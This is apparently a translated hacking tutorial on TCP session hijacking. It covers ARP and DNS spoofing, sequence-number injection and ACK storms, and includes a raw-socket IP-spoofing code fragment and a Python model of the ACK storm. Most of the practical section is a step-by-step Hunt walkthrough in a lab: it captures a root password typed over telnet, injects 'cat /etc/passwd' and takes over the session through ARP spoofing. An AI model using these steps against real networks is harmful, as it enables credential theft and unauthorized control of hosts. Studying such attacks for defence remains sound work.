Introduction

Usually an intrusion is aimed at a single host, and once administrator privileges have been obtained the attacker is quite pleased with himself; in reality, the real intrusion is taking over the entire internal network. There are many attack methods for an internal network, but the more effective ones are none other than ARP spoofing and DNS spoofing. Whatever technique is used, it comes down to capturing the target's packets and then analysing them for sensitive data. If the target is on a shared network (a hub-based network), you only need to put the NIC into "promiscuous mode" and run a sniffer to capture the data you want. On a switched network (a switch-based network) this does not work, because there are three network environments that a sniffer cannot span: "bridge", "switch" and "router". Unfortunately, a switched network is still powerless against ARP spoofing; with ARP spoofing we can carry out a higher level of "intrusion" and truly control the internal network. That is the session hijacking attack discussed in this article.

I. Session hijacking

1. What is session hijacking

Take an example from real life: you go to the market to buy vegetables, pay for them, ask the vendor to hold them while you do something else, and come back for them later. If a stranger turns up to collect the vegetables, will the vendor hand them over? Of course this is only a metaphor, but it is a metaphor for a session. A so-called session is a communication between two hosts. For example, when you telnet to a host, that is a Telnet session; when you browse a website, that is an HTTP session. Session hijacking combines sniffing and spoofing techniques. For example, during a normal session an attacker joins as a third party: he can insert malicious data into the normal packets, he can sniff the session between the two parties, or he can even replace one of the hosts and take over the session.
We can divide session hijacking into two types: 1) man-in-the-middle (MITM); 2) injection. It can also be divided into two forms: 1) passive hijacking; 2) active hijacking. Passive hijacking is in fact sniffing the data stream of the two parties in the background to obtain sensitive data; active hijacking means "kicking" one party out of the session, then substituting yourself for that host and taking over the session. This attack is very harmful, and the attacker can do a lot of things, such as "cat /etc/master.passwd" (the shadow file under FreeBSD).

Introduction to MITM attacks

This is what we usually call a "man-in-the-middle attack"; the one most discussed online is SMB session hijacking, which is a typical man-in-the-middle attack. To carry out a man-in-the-middle attack, the attacker first needs to use ARP spoofing or DNS spoofing to route the communication between the two parties through himself, and this change is completely transparent to both parties. Hacker Defense Line has published many introductions to ARP spoofing, and there is plenty of information online, so I will not say more about it and will only talk about DNS spoofing. DNS (Domain Name System), the domain name server, is something we use almost every day.
For a normal DNS request, for example when you enter www.hacker.com.cn in the browser, the HOSTS file is checked first; if it contains a corresponding IP, that IP address is used to access the website (in fact, the HOSTS file can be used to implement DNS spoofing); if not, the DNS server is asked, it resolves the corresponding IP address and returns it to me, and finally you reach the Hacker Defense Line website. DNS spoofing is when the target sends its DNS request to the attacker, the attacker replaces the correct IP address with another IP in the DNS response, and you then connect to the IP the attacker specified; the attacker has already placed a malicious web page at this IP, and you have been "set up" by the attacker without knowing it. DNS spoofing can also be carried out on a WAN; the more common forms are "web server redirection", "mail server redirection" and so on. Whether ARP spoofing or DNS spoofing is used, a man-in-the-middle attack changes the normal flow of traffic: it is equivalent to a transparent proxy sitting between the two sides of the session, which can obtain everything it wants to know, and can even do so when a defective encryption protocol is in use.

Introduction to injection attacks

This method of session hijacking is simpler than a man-in-the-middle attack: it does not change the communication flow between the two parties, but inserts data into their normal communication stream. Two techniques are needed for an injection attack: 1) IP spoofing; 2) predicting TCP sequence numbers. For UDP, simply forging the IP address is enough to send data, because UDP has no TCP-style three-way handshake; but application protocols built on UDP may have their own flow-control mechanisms, so some extra work is needed. IP spoofing is needed in two situations: 1) to hide your own IP address; 2) to carry out an intrusion using a trust relationship between two machines.
On UNIX/Linux platforms you can use a raw socket to construct the IP packet directly and fill in a false IP address in the IP header, but this requires root privileges; on Windows, Winsock cannot be used, and you need WinPcap (libnet can also be used). For example, on a Linux system you first open a raw socket and then write the IP header and the other data yourself.
Refer to the following example code (a fragment: ip, tcp, buf, addr and the address "xxx" are left to the caller):

    /* open a raw socket and tell the kernel the IP header is supplied by the caller */
    sockfd = socket(AF_INET, SOCK_RAW, 255);
    setsockopt(sockfd, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on));
    struct ip *ip;
    struct tcphdr *tcp;
    struct pseudohdr pseudoheader;
    ip->ip_src.s_addr = xxx;                              /* source address chosen by the caller */
    pseudoheader.saddr.s_addr = ip->ip_src.s_addr;        /* pseudo-header must match the IP header */
    tcp->check = tcpchksum((u_short *)&pseudoheader, 12 + sizeof(struct tcphdr));
    sendto(sockfd, buf, len, 0, (const struct sockaddr *)addr, sizeof(struct sockaddr_in));

For a TCP-based injection session, the attacker should first use sniffing to obtain the session information and then construct the correct sequence numbers from it; if that is not possible, the target's ISN (initial sequence number) must be guessed first, which makes hijacking the session much harder. Why must the sequence number of the session be guessed? Please read the following part.
2. TCP session hijacking

This article mainly describes the hijacking of TCP sessions. Hijacking some unreliable protocols is easy because they provide no authentication measures; TCP is a reliable transport protocol, so it needs to be discussed. According to TCP/IP, communicating with TCP requires two sequence numbers; TCP uses these two sequence numbers to ensure connection synchronisation and secure communication, and the system's TCP/IP stack generates these values based on time or linearly. During communication the sequence numbers of both sides depend on each other, which is why TCP is a reliable transport protocol (see RFC 793). If an attacker tries to hijack at this point, the result is certainly failure, because the session "does not know" the attacker and the attacker cannot supply legal sequence numbers; so the key to session hijacking is predicting the correct sequence number, and the attacker can obtain this information with sniffing.

TCP sequence numbers

Now let us discuss the issues related to TCP sequence numbers. Every packet carries two sequence numbers:

SEQ: the sequence number of the first byte of the current packet
ACK: the sequence number of the first byte the sender expects to receive from the other side

Assume the two sides now need to communicate:

s_seq: the next byte to be sent (sequence number)
s_ack: the next byte to be received
s_wind: the receive window // the above belong to the server
c_seq: the next byte to be sent (sequence number)
c_ack: the next byte to be received
c_wind: the receive window // the above belong to the client

They must satisfy the following logical relationships, otherwise the packet is discarded and an ACK packet (containing the desired sequence number) is returned.
c_ack <= c_seq <= c_ack + c_wind
s_ack <= s_seq <= s_ack + s_wind

If the logical relationships above are not satisfied, a "fatal weakness" appears. Please read on.

Fatal weakness

This fatal weakness is the ACK storm. When one end of the session receives an unexpected packet, it returns an ACK packet with the sequence number it expects; at the other end this packet is also unexpected, so it again returns an ACK packet with its own expected sequence number ... This goes back and forth, forming a vicious circle that finally leads to the ACK storm. The better solution is ARP spoofing, so that the packets are "normally" sent to the attacker, who then forwards them; in the end the session can be hijacked without worrying about an ACK storm. Of course, not all systems produce an ACK storm; for example, the TCP/IP stack of Linux differs slightly from the description in the RFC. Note that the ACK storm only occurs in injection hijacking.
TCP session hijacking process

Assume hosts A and B have an established TCP session and C is the attacker. The hijacking process is as follows:

A sends B a packet:          SEQ (hex): X       ACK (hex): Y       Flags: -AP---   Window: zzzz, packet size: 60
B responds to A:             SEQ (hex): Y       ACK (hex): X+60    Flags: -AP---   Window: zzzz, packet size: 50
A responds to B:             SEQ (hex): X+60    ACK (hex): Y+50    Flags: -AP---   Window: zzzz, packet size: 40
B responds to A:             SEQ (hex): Y+50    ACK (hex): X+100   Flags: -AP---   Window: zzzz, packet size: 30
C, pretending to be host A:  SEQ (hex): X+100   ACK (hex): Y+80    Flags: -AP---   Window: zzzz, packet size: 20
B responds to A:             SEQ (hex): Y+80    ACK (hex): X+120   Flags: -AP---   Window: zzzz, packet size: 10

Host B executes the command that attacker C sent while pretending to be host A, and returns a packet to host A; however, host A does not recognise the packet sent by host B, so host A returns a packet to host B with the sequence number it expects, and an ACK storm is formed. If the ACK storm is avoided (for example with the ARP spoofing mentioned before), the session can be hijacked successfully. That covers the theory; next I will demonstrate session hijacking with a specific example.

II. Session hijacking in practice

1. Tools
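To make the bookkeeping in the trace above concrete, here is a small Python model of it (an added example, not code from the article or from Hunt): it replays the six packets with the receiver-side check from RFC 793, shows B consuming C's forged segment, and shows A and B then answering each other with pure ACKs that neither side accepts, which is the ACK storm. X, Y and the window size are constructed values, and sequence-number wraparound is ignored.

```python
# Added example (not from the article): a minimal model of the six-packet
# trace, showing why B accepts the forged segment while A is left
# desynchronised. X, Y and the 0x2000 window are constructed values.

class Endpoint:
    """One side of the session: next byte it will send, next byte it expects."""
    def __init__(self, name, isn, peer_isn, wnd=0x2000):
        self.name, self.snd_nxt, self.rcv_nxt, self.rcv_wnd = name, isn, peer_isn, wnd

def acceptable(rx, seq, ack):
    """Receiver-side test in RFC 793 terms: the segment must start exactly at
    rx.rcv_nxt inside the receive window, and must not acknowledge bytes rx
    has never sent (ack > snd_nxt)."""
    in_window = rx.rcv_nxt <= seq < rx.rcv_nxt + rx.rcv_wnd
    return in_window and seq == rx.rcv_nxt and ack <= rx.snd_nxt

def receive(rx, seq, ack, length):
    """Deliver a segment to rx. Returns None when it is consumed, otherwise the
    (seq, ack) of the pure ACK rx sends back to say what it expected instead."""
    if not acceptable(rx, seq, ack):
        return (rx.snd_nxt, rx.rcv_nxt)
    rx.rcv_nxt += length
    return None

def data_segment(tx, length):
    """tx sends `length` payload bytes from its own real state."""
    seg = (tx.snd_nxt, tx.rcv_nxt, length)
    tx.snd_nxt += length
    return seg

def run_trace(x, y, forged=True, storm_limit=8):
    """Replay the trace: four honest packets, then the 20-byte segment either
    forged by C from sniffed numbers (forged=True) or sent by A itself. Pure
    ACKs then bounce between A and B until one side accepts, or until
    storm_limit exchanges pass with no state change: the ACK storm."""
    a, b = Endpoint("A", x, y), Endpoint("B", y, x)
    for tx, rx, n in ((a, b, 60), (b, a, 50), (a, b, 40), (b, a, 30)):
        assert receive(rx, *data_segment(tx, n)) is None
    seg = (a.snd_nxt, a.rcv_nxt, 20) if forged else data_segment(a, 20)
    assert receive(b, *seg) is None            # B cannot tell the two apart
    reply, rx, rounds = receive(a, *data_segment(b, 10)), b, 0
    while reply is not None and rounds < storm_limit:
        reply = receive(rx, *reply, 0)         # a pure ACK carries no payload
        rx = a if rx is b else b
        rounds += 1
    return {"b_rcv_nxt": b.rcv_nxt, "a_snd_nxt": a.snd_nxt,
            "ack_rounds": rounds,
            "ack_storm": reply is not None and rounds == storm_limit}
```

In the forged run B's rcv_nxt reaches X+120 while A's snd_nxt stays at X+100, so B's ACK of X+120 is for bytes A never sent and the two sides only ever answer each other with corrections; the honest run (forged=False) ends after B's reply with no ACK exchange at all.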
There are many tools that can hijack sessions. Juggernaut, for example, is a network sniffer that can hijack TCP sessions; TTY Watcher is used to hijack connections on a single host; toolkits such as dsniff can also hijack sessions, it just depends on whether you know how to use them. The session hijacking tool discussed here, however, is Hunt. Its author is Pavel Krauz, and it runs on Linux and some UNIX platforms. It is very powerful: first, it works properly on both shared and switched networks; second, it can perform both man-in-the-middle and injection attacks; it can also sniff, list sessions, watch sessions and reset sessions. From the discussion above we know that an ACK storm easily appears in an injection attack, and the solution is ARP spoofing; when Hunt performs an injection attack it does not do ARP spoofing, but after the hijack it sends a TCP packet with the RST flag to the session to interrupt it and stop the ACK storm from continuing. For the man-in-the-middle attack it first performs ARP spoofing and then hijacks the session. The latest version of Hunt is 1.5; the source package and binaries can be downloaded from Pavel Krauz's website: http://lin.fsid.cvut.cz/~kra/#Hunt. Now let us see how to use Hunt. First download and compile the source:

[root@dahubaobao hunt]# wget http://www.ringz.org/hunt-1.5.tgz
[root@dahubaobao hunt]# tar zxvf hunt-1.5.tgz
[root@dahubaobao hunt]# cd hunt-1.5
[root@dahubaobao hunt-1.5]# make
[root@dahubaobao hunt-1.5]# ./hunt

Hunt is operated entirely through menus; the meaning of each option is explained below.

l/w/r) list/watch/reset connections // l (the letter L) lists the sessions on the current network; w watches a session on the current network; r resets a session on the current network.
a) arp/simple hijack (avoids ack storm if arp used) // man-in-the-middle attack (session hijacking): Hunt first performs ARP spoofing and then hijacks; this method avoids the ACK storm.
s) simple hijack // simple session hijacking, i.e. the injection attack; an ACK storm will appear.
d) daemons rst/arp/sniff/mac // this option provides four functions: terminating sessions by automatically sending TCP packets with the RST flag; ARP spoofing with packet forwarding; sniffing, which needs no explanation; and collecting the MAC addresses on the current network.
The other options are simple and are not described further.
Let's look at a specific example; I think everyone can't wait! ^_^

2. Application example

Test environment:
Attacker: Red Hat Linux 9.0, IP: 192.168.0.10
Host A: Windows Advanced Server, IP: 192.168.0.1
Host B: FreeBSD 4.9 Stable, IP: 192.168.0.20

[root@dahubaobao hunt-1.5]# ./hunt
/*
 *      hunt 1.5
 *      multipurpose connection intruder / sniffer for Linux
 *      (c) 1998-2000 by kra
 */
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u)     host up tests
a)     arp/simple hijack (avoids ack storm if arp used)
s)     simple hijack
d)     daemons rst/arp/sniff/mac
o)     options
x)     exit
*> l                // list the sessions on the current network
0) 192.168.0.1 [3465] --> 192.168.0.20 [23]   // host A has telnetted to host B
--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u)     host up tests
a)     arp/simple hijack (avoids ack storm if arp used)
s)     simple hijack
d)     daemons rst/arp/sniff/mac
o)     options
x)     exit
*> w                // watch a session on the current network
0) 192.168.0.1 [3465] --> 192.168.0.20 [23]
choose conn> 0      // select the session to watch; my setup is limited, so I cannot show several sessions at once
dump [s]rc/[d]st/[b]oth [b]>                  // press Enter
print src/dst same characters y/n [n]>        // press Enter
Now the session is being watched, and everything host A types can be seen. After host A telnets in and logs in, it runs su root directly, and the password typed after it is root's password. This system is now completely under control; let's play!

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u)     host up tests
a)     arp/simple hijack (avoids ack storm if arp used)
s)     simple hijack
d)     daemons rst/arp/sniff/mac
o)     options
x)     exit
*> s                // injection session hijacking
0) 192.168.0.1 [3465] --> 192.168.0.20 [23]
choose conn> 0
dump connection y/n [n]>
Enter the command string you wish executed or [cr]> cat /etc/passwd

The attacker's intent is to obtain the contents of host B's passwd file, but because of the defect of injection hijacking an ACK storm is caused; therefore Hunt sends a TCP packet with the RST flag to stop the ACK storm.

--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u)     host up tests
a)     arp/simple hijack (avoids ack storm if arp used)
s)     simple hijack
d)     daemons rst/arp/sniff/mac
o)     options
x)     exit
*> a                // man-in-the-middle session hijacking
0) 192.168.0.1 [3862] --> 192.168.0.20 [23]
choose conn> 0
arp spoof src in dst y/n [y]>
src MAC [xx:xx:xx:xx:xx:xx]>
arp spoof dst in src y/n [y]>
dst MAC [xx:xx:xx:xx:xx:xx]>
input mode [r]aw, [l]ine+echo+\r, line+[e]cho [r]>
dump connection y/n [y]> n
press key to take over of connection
arp spoof of 192.168.0.20 with fake mac xx:xx:xx:xx:xx:xx in host 192.168.0.1 failed
do you want to force arp spoof until successed y/n [y]> CTRL-C to break
ctrl-c              // press Ctrl-C manually; there is no need to wait
- operation canceled - press any key>
arp spoof failed
arp spoof of 192.168.0.20 in host 192.168.0.1 failed
you took over the connection
CTRL-] to break
-bash-2.05b$ id
..........

Now the attacker has successfully hijacked the Telnet session between hosts A and B.
The attacker can see every command that host A enters, and can also insert commands of his own.